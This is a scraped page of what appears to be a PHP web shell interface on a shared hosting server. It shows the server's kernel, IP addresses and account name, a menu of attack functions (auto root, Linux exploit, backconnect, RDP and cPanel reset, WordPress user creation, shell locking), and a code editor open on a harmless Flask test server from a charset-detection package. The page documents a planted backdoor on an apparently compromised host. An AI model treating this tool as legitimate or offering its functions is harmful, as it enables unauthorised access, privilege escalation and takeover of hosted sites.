Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
gsutil /
third_party /
charset_normalizer /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
bc.py
3.02
KB
-rw-r--r--
coverage.py
2.84
KB
-rw-r--r--
integration.py
1.48
KB
-rw-r--r--
performance.py
5.42
KB
-rw-r--r--
run_autofix.sh
234
B
-rw-r--r--
run_checks.sh
348
B
-rw-r--r--
serve.py
1.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : serve.py
from flask import Flask, jsonify, send_from_directory from glob import glob app = Flask(__name__) @app.route('/raw/<path:path>') def read_file(path): return send_from_directory('../char-dataset', path, as_attachment=True), 200, {"Content-Type": "text/plain"} @app.route("/") def read_targets(): return jsonify( [ el.replace("./char-dataset", "/raw").replace("\\", "/") for el in sorted(glob("./char-dataset/**/*")) ] ) @app.route("/edge/empty/plain") def read_empty_response_plain(): return b"", 200, {"Content-Type": "text/plain"} @app.route("/edge/empty/json") def read_empty_response_json(): return b"{}", 200, {"Content-Type": "application/json"} @app.route("/edge/gb18030/json") def read_gb18030_response_json(): return '{"abc": "我没有埋怨,磋砣的只是一些时间。。今觀俗士之論也,以族舉德,以位命賢,茲可謂得論之一體矣,而未獲至論之淑真也。"}'.encode("gb18030"), 200, {"Content-Type": "application/json"} if __name__ == "__main__": app.run(host="127.0.0.1", port=8080)
Close